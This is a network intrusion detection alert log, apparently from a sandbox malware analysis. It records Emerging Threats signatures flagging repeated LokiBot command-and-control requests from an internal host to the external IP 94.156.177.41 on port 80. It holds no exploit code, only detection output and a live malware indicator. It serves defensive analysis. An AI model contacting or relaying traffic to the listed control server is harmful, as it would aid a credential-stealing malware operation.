2025-01-11T07:46:12.563647+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50097	94.156.177.41	80	TCP
2025-01-11T07:46:13.437852+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50098	94.156.177.41	80	TCP
2025-01-11T07:46:14.311717+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50099	94.156.177.41	80	TCP
2025-01-11T07:46:15.196451+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50100	94.156.177.41	80	TCP
2025-01-11T07:46:16.066977+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50101	94.156.177.41	80	TCP
2025-01-11T07:46:16.947180+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50102	94.156.177.41	80	TCP
2025-01-11T07:46:17.795814+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50103	94.156.177.41	80	TCP
2025-01-11T07:46:18.795869+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50104	94.156.177.41	80	TCP
2025-01-11T07:46:19.678030+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50105	94.156.177.41	80	TCP
2025-01-11T07:46:20.545406+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50106	94.156.177.41	80	TCP
2025-01-11T07:46:21.450794+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50107	94.156.177.41	80	TCP
2025-01-11T07:46:22.498284+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50108	94.156.177.41	80	TCP
2025-01-11T07:46:23.372578+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50109	94.156.177.41	80	TCP
2025-01-11T07:46:24.220617+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50110	94.156.177.41	80	TCP
2025-01-11T07:46:25.095420+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50111	94.156.177.41	80	TCP
2025-01-11T07:46:25.958653+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50112	94.156.177.41	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T07:44:28.030760+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49709	94.156.177.41	80	TCP
2025-01-11T07:44:28.931958+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49711	94.156.177.41	80	TCP
2025-01-11T07:44:29.967134+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49713	94.156.177.41	80	TCP
2025-01-11T07:44:30.851513+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49714	94.156.177.41	80	TCP
2025-01-11T07:44:31.718507+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49715	94.156.177.41	80	TCP
2025-01-11T07:44:33.640345+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49716	94.156.177.41	80	TCP
2025-01-11T07:44:34.512627+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49717	94.156.177.41	80	TCP
2025-01-11T07:44:35.396140+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49718	94.156.177.41	80	TCP
2025-01-11T07:44:36.266782+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49719	94.156.177.41	80	TCP
2025-01-11T07:44:37.189451+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49720	94.156.177.41	80	TCP
2025-01-11T07:44:38.297474+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49721	94.156.177.41	80	TCP
2025-01-11T07:44:39.175539+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49722	94.156.177.41	80	TCP
2025-01-11T07:44:40.083235+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49724	94.156.177.41	80	TCP
2025-01-11T07:44:41.166479+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49725	94.156.177.41	80	TCP
2025-01-11T07:44:42.037120+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49730	94.156.177.41	80	TCP
2025-01-11T07:44:42.934004+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49738	94.156.177.41	80	TCP
2025-01-11T07:44:43.818626+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49743	94.156.177.41	80	TCP
2025-01-11T07:44:44.687247+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49749	94.156.177.41	80	TCP
2025-01-11T07:44:45.559460+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49755	94.156.177.41	80	TCP
2025-01-11T07:44:46.454393+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49761	94.156.177.41	80	TCP
2025-01-11T07:44:47.315113+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49771	94.156.177.41	80	TCP
2025-01-11T07:44:48.186037+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49777	94.156.177.41	80	TCP
2025-01-11T07:44:49.200455+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49784	94.156.177.41	80	TCP
2025-01-11T07:44:50.072387+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49790	94.156.177.41	80	TCP
2025-01-11T07:44:51.077306+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49796	94.156.177.41	80	TCP
2025-01-11T07:44:51.942413+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49804	94.156.177.41	80	TCP
2025-01-11T07:44:52.835032+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49811	94.156.177.41	80	TCP
2025-01-11T07:44:53.762221+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49816	94.156.177.41	80	TCP
2025-01-11T07:44:54.673111+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49821	94.156.177.41	80	TCP
2025-01-11T07:44:55.536663+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49826	94.156.177.41	80	TCP
2025-01-11T07:44:56.429080+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49834	94.156.177.41	80	TCP
2025-01-11T07:44:57.288262+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49840	94.156.177.41	80	TCP
2025-01-11T07:44:58.144593+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49849	94.156.177.41	80	TCP
2025-01-11T07:44:59.022080+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49855	94.156.177.41	80	TCP
2025-01-11T07:45:00.217467+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49862	94.156.177.41	80	TCP
2025-01-11T07:45:01.091724+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49869	94.156.177.41	80	TCP
2025-01-11T07:45:01.958700+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49878	94.156.177.41	80	TCP
2025-01-11T07:45:03.172234+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49884	94.156.177.41	80	TCP
2025-01-11T07:45:04.029029+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49891	94.156.177.41	80	TCP
2025-01-11T07:45:04.919494+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49899	94.156.177.41	80	TCP
2025-01-11T07:45:05.802703+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49905	94.156.177.41	80	TCP
2025-01-11T07:45:06.809719+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49911	94.156.177.41	80	TCP
2025-01-11T07:45:07.882275+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49919	94.156.177.41	80	TCP
2025-01-11T07:45:08.745796+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49928	94.156.177.41	80	TCP
2025-01-11T07:45:09.642873+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49934	94.156.177.41	80	TCP
2025-01-11T07:45:10.652685+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49939	94.156.177.41	80	TCP
2025-01-11T07:45:11.552968+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49945	94.156.177.41	80	TCP
2025-01-11T07:45:12.418770+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49953	94.156.177.41	80	TCP
2025-01-11T07:45:13.284283+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49961	94.156.177.41	80	TCP
2025-01-11T07:45:14.187829+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49968	94.156.177.41	80	TCP
2025-01-11T07:45:15.050986+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49974	94.156.177.41	80	TCP
2025-01-11T07:45:15.918385+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49980	94.156.177.41	80	TCP
2025-01-11T07:45:16.804729+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49986	94.156.177.41	80	TCP
2025-01-11T07:45:17.675448+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49993	94.156.177.41	80	TCP
2025-01-11T07:45:18.537448+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50002	94.156.177.41	80	TCP
2025-01-11T07:45:19.654529+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50010	94.156.177.41	80	TCP
2025-01-11T07:45:20.537471+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50016	94.156.177.41	80	TCP
2025-01-11T07:45:21.400480+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50022	94.156.177.41	80	TCP
2025-01-11T07:45:22.637453+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50027	94.156.177.41	80	TCP
2025-01-11T07:45:23.500259+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50037	94.156.177.41	80	TCP
2025-01-11T07:45:24.391600+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50043	94.156.177.41	80	TCP
2025-01-11T07:45:25.387120+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50044	94.156.177.41	80	TCP
2025-01-11T07:45:26.266552+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50045	94.156.177.41	80	TCP
2025-01-11T07:45:27.122844+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50046	94.156.177.41	80	TCP
2025-01-11T07:45:28.215382+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50047	94.156.177.41	80	TCP
2025-01-11T07:45:29.109982+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50048	94.156.177.41	80	TCP
2025-01-11T07:45:29.977511+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50049	94.156.177.41	80	TCP
2025-01-11T07:45:30.838290+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50050	94.156.177.41	80	TCP
2025-01-11T07:45:31.709287+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50051	94.156.177.41	80	TCP
2025-01-11T07:45:32.579246+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50052	94.156.177.41	80	TCP
2025-01-11T07:45:33.462401+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50053	94.156.177.41	80	TCP
2025-01-11T07:45:34.323221+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50054	94.156.177.41	80	TCP
2025-01-11T07:45:35.186639+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50055	94.156.177.41	80	TCP
2025-01-11T07:45:36.073409+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50056	94.156.177.41	80	TCP
2025-01-11T07:45:37.239895+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50057	94.156.177.41	80	TCP
2025-01-11T07:45:38.251440+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50058	94.156.177.41	80	TCP
2025-01-11T07:45:39.138394+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50059	94.156.177.41	80	TCP
2025-01-11T07:45:40.007540+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50060	94.156.177.41	80	TCP
2025-01-11T07:45:40.857097+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50061	94.156.177.41	80	TCP
2025-01-11T07:45:41.732826+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50062	94.156.177.41	80	TCP
2025-01-11T07:45:42.753857+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50063	94.156.177.41	80	TCP
2025-01-11T07:45:43.607936+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50064	94.156.177.41	80	TCP
2025-01-11T07:45:44.450980+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50065	94.156.177.41	80	TCP
2025-01-11T07:45:45.428851+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50066	94.156.177.41	80	TCP
2025-01-11T07:45:46.295558+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50067	94.156.177.41	80	TCP
2025-01-11T07:45:47.180099+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50068	94.156.177.41	80	TCP
2025-01-11T07:45:48.062041+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50069	94.156.177.41	80	TCP
2025-01-11T07:45:48.926425+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50070	94.156.177.41	80	TCP
2025-01-11T07:45:49.824114+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50071	94.156.177.41	80	TCP
2025-01-11T07:45:50.734862+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50072	94.156.177.41	80	TCP
2025-01-11T07:45:51.619631+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50073	94.156.177.41	80	TCP
2025-01-11T07:45:52.455714+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50074	94.156.177.41	80	TCP
2025-01-11T07:45:53.300650+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50075	94.156.177.41	80	TCP
2025-01-11T07:45:54.576109+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50076	94.156.177.41	80	TCP
2025-01-11T07:45:55.483384+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50077	94.156.177.41	80	TCP
2025-01-11T07:45:56.355282+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50078	94.156.177.41	80	TCP
2025-01-11T07:45:57.212131+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50079	94.156.177.41	80	TCP
2025-01-11T07:45:58.216432+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50080	94.156.177.41	80	TCP
2025-01-11T07:45:59.120917+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50081	94.156.177.41	80	TCP
2025-01-11T07:45:59.986914+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50082	94.156.177.41	80	TCP
2025-01-11T07:46:00.838213+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50083	94.156.177.41	80	TCP
2025-01-11T07:46:01.716963+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50084	94.156.177.41	80	TCP
2025-01-11T07:46:02.579117+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50085	94.156.177.41	80	TCP
2025-01-11T07:46:03.569616+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50086	94.156.177.41	80	TCP
2025-01-11T07:46:04.429247+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50087	94.156.177.41	80	TCP
2025-01-11T07:46:05.309228+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50088	94.156.177.41	80	TCP
2025-01-11T07:46:06.196145+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50089	94.156.177.41	80	TCP
2025-01-11T07:46:07.103223+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50090	94.156.177.41	80	TCP
2025-01-11T07:46:07.967380+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50091	94.156.177.41	80	TCP
2025-01-11T07:46:08.856365+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50092	94.156.177.41	80	TCP
2025-01-11T07:46:09.756222+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50093	94.156.177.41	80	TCP
2025-01-11T07:46:10.621993+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50094	94.156.177.41	80	TCP
2025-01-11T07:46:11.520963+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50095	94.156.177.41	80	TCP
2025-01-11T07:46:12.414303+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50096	94.156.177.41	80	TCP
2025-01-11T07:46:13.286242+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50097	94.156.177.41	80	TCP
2025-01-11T07:46:14.163375+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50098	94.156.177.41	80	TCP
2025-01-11T07:46:15.040084+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50099	94.156.177.41	80	TCP
2025-01-11T07:46:15.899908+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50100	94.156.177.41	80	TCP
2025-01-11T07:46:16.788672+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50101	94.156.177.41	80	TCP
2025-01-11T07:46:17.639411+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50102	94.156.177.41	80	TCP
2025-01-11T07:46:18.636150+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50103	94.156.177.41	80	TCP
2025-01-11T07:46:19.502502+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50104	94.156.177.41	80	TCP
2025-01-11T07:46:20.387384+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50105	94.156.177.41	80	TCP
2025-01-11T07:46:21.299723+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50106	94.156.177.41	80	TCP
2025-01-11T07:46:22.345032+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50107	94.156.177.41	80	TCP
2025-01-11T07:46:23.228495+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50108	94.156.177.41	80	TCP
2025-01-11T07:46:24.079217+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50109	94.156.177.41	80	TCP
2025-01-11T07:46:24.943363+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50110	94.156.177.41	80	TCP
2025-01-11T07:46:25.812030+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50111	94.156.177.41	80	TCP
2025-01-11T07:46:26.689397+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50112	94.156.177.41	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T07:44:28.030760+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49709	94.156.177.41	80	TCP
2025-01-11T07:44:28.931958+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49711	94.156.177.41	80	TCP
2025-01-11T07:44:29.967134+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49713	94.156.177.41	80	TCP
2025-01-11T07:44:30.851513+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49714	94.156.177.41	80	TCP
2025-01-11T07:44:31.718507+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49715	94.156.177.41	80	TCP
2025-01-11T07:44:33.640345+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49716	94.156.177.41	80	TCP
2025-01-11T07:44:34.512627+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49717	94.156.177.41	80	TCP
2025-01-11T07:44:35.396140+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49718	94.156.177.41	80	TCP
2025-01-11T07:44:36.266782+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49719	94.156.177.41	80	TCP
2025-01-11T07:44:37.189451+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49720	94.156.177.41	80	TCP
2025-01-11T07:44:38.297474+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49721	94.156.177.41	80	TCP
2025-01-11T07:44:39.175539+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49722	94.156.177.41	80	TCP
2025-01-11T07:44:40.083235+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49724	94.156.177.41	80	TCP
2025-01-11T07:44:41.166479+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49725	94.156.177.41	80	TCP
2025-01-11T07:44:42.037120+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49730	94.156.177.41	80	TCP
2025-01-11T07:44:42.934004+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49738	94.156.177.41	80	TCP
2025-01-11T07:44:43.818626+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49743	94.156.177.41	80	TCP
2025-01-11T07:44:44.687247+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49749	94.156.177.41	80	TCP
2025-01-11T07:44:45.559460+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49755	94.156.177.41	80	TCP
2025-01-11T07:44:46.454393+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49761	94.156.177.41	80	TCP
2025-01-11T07:44:47.315113+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49771	94.156.177.41	80	TCP
2025-01-11T07:44:48.186037+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49777	94.156.177.41	80	TCP
2025-01-11T07:44:49.200455+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49784	94.156.177.41	80	TCP
2025-01-11T07:44:50.072387+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49790	94.156.177.41	80	TCP
2025-01-11T07:44:51.077306+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49796	94.156.177.41	80	TCP
2025-01-11T07:44:51.942413+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49804	94.156.177.41	80	TCP
2025-01-11T07:44:52.835032+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49811	94.156.177.41	80	TCP
2025-01-11T07:44:53.762221+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49816	94.156.177.41	80	TCP
2025-01-11T07:44:54.673111+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49821	94.156.177.41	80	TCP
2025-01-11T07:44:55.536663+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49826	94.156.177.41	80	TCP
2025-01-11T07:44:56.429080+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49834	94.156.177.41	80	TCP
2025-01-11T07:44:57.288262+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49840	94.156.177.41	80	TCP
2025-01-11T07:44:58.144593+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49849	94.156.177.41	80	TCP
2025-01-11T07:44:59.022080+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49855	94.156.177.41	80	TCP
2025-01-11T07:45:00.217467+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49862	94.156.177.41	80	TCP
2025-01-11T07:45:01.091724+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49869	94.156.177.41	80	TCP
2025-01-11T07:45:01.958700+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49878	94.156.177.41	80	TCP
2025-01-11T07:45:03.172234+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49884	94.156.177.41	80	TCP
2025-01-11T07:45:04.029029+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49891	94.156.177.41	80	TCP
2025-01-11T07:45:04.919494+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49899	94.156.177.41	80	TCP
2025-01-11T07:45:05.802703+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49905	94.156.177.41	80	TCP
2025-01-11T07:45:06.809719+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49911	94.156.177.41	80	TCP
2025-01-11T07:45:07.882275+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49919	94.156.177.41	80	TCP
2025-01-11T07:45:08.745796+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49928	94.156.177.41	80	TCP
2025-01-11T07:45:09.642873+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49934	94.156.177.41	80	TCP
2025-01-11T07:45:10.652685+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49939	94.156.177.41	80	TCP
2025-01-11T07:45:11.552968+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49945	94.156.177.41	80	TCP
2025-01-11T07:45:12.418770+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49953	94.156.177.41	80	TCP
2025-01-11T07:45:13.284283+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49961	94.156.177.41	80	TCP
2025-01-11T07:45:14.187829+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49968	94.156.177.41	80	TCP
2025-01-11T07:45:15.050986+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49974	94.156.177.41	80	TCP
2025-01-11T07:45:15.918385+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49980	94.156.177.41	80	TCP
2025-01-11T07:45:16.804729+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49986	94.156.177.41	80	TCP
2025-01-11T07:45:17.675448+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49993	94.156.177.41	80	TCP
2025-01-11T07:45:18.537448+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50002	94.156.177.41	80	TCP
2025-01-11T07:45:19.654529+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50010	94.156.177.41	80	TCP
2025-01-11T07:45:20.537471+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50016	94.156.177.41	80	TCP
2025-01-11T07:45:21.400480+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50022	94.156.177.41	80	TCP
2025-01-11T07:45:22.637453+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50027	94.156.177.41	80	TCP
2025-01-11T07:45:23.500259+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50037	94.156.177.41	80	TCP
2025-01-11T07:45:24.391600+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50043	94.156.177.41	80	TCP
2025-01-11T07:45:25.387120+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50044	94.156.177.41	80	TCP
2025-01-11T07:45:26.266552+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50045	94.156.177.41	80	TCP
2025-01-11T07:45:27.122844+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50046	94.156.177.41	80	TCP
2025-01-11T07:45:28.215382+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50047	94.156.177.41	80	TCP
2025-01-11T07:45:29.109982+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50048	94.156.177.41	80	TCP
2025-01-11T07:45:29.977511+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50049	94.156.177.41	80	TCP
2025-01-11T07:45:30.838290+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50050	94.156.177.41	80	TCP
2025-01-11T07:45:31.709287+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50051	94.156.177.41	80	TCP
2025-01-11T07:45:32.579246+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50052	94.156.177.41	80	TCP
2025-01-11T07:45:33.462401+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50053	94.156.177.41	80	TCP
2025-01-11T07:45:34.323221+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50054	94.156.177.41	80	TCP
2025-01-11T07:45:35.186639+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50055	94.156.177.41	80	TCP
2025-01-11T07:45:36.073409+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50056	94.156.177.41	80	TCP
2025-01-11T07:45:37.239895+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50057	94.156.177.41	80	TCP
2025-01-11T07:45:38.251440+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50058	94.156.177.41	80	TCP
2025-01-11T07:45:39.138394+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50059	94.156.177.41	80	TCP
2025-01-11T07:45:40.007540+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50060	94.156.177.41	80	TCP
2025-01-11T07:45:40.857097+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50061	94.156.177.41	80	TCP
2025-01-11T07:45:41.732826+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50062	94.156.177.41	80	TCP
2025-01-11T07:45:42.753857+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50063	94.156.177.41	80	TCP
2025-01-11T07:45:43.607936+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50064	94.156.177.41	80	TCP
